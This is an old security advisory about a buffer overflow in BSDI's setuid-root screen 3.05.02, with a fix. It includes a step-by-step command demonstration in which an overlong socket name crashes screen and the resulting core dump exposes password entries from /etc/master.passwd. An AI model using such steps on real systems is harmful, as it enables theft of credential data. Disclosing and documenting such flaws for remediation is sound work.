COMMAND /usr/contrib/bin/screen SYSTEMS AFFECTED BSDI PROBLEM Khelbin Sunvold posted following. The program under question is /usr/contrib/bin/screen (BSDI). This is screen version 3.05.02 and is installed setuid root, as it is "supposed" to be. Here is a demonstration: $ screen Screen version 3.05.02 (FAU) 19-Aug-93 Copyright (c) 1993 Juergen Weigert, Michael Schroeder Copyright (c) 1987 Oliver Laumann [snip boring messages] [Press Space or Return to end.] $ screen $ cd /tmp/screens/S-khelbin $ ls 246.ttyp7.comet $ mv 246.ttyp* 246.ttyp7.cometanonymousanonymousanonymousanonymous\ > anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous\ > anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous $ screen -ls /tmp/screens/S-khelbin/246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous: connect: Invalid argument %1 278 Abort - core dumped screen -ls $ ls -l total 176 srwx------ 1 khelbin khelbin 0 Feb 15 21:33 246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous -rw-r--r-- 1 khelbin khelbin 172032 Feb 15 21:33 core.screen $ strings core.screen|less The core.screen file contains unencrypted password strings from /etc/master.passwd, which of course, should not be readable by me. SOLUTION chmod -s /usr/contrib/bin/screen while using old version. There were several buffer overflows in old versions of screen, the latest version is 3.7.2 available from ftp://prep.ai.mit.edu/pub/gnu/screen-3.7.2.tar.gz. The overflows have been fixed for a long time now, and I was unable to reproduce the core dump on linux with screen 3.07.01.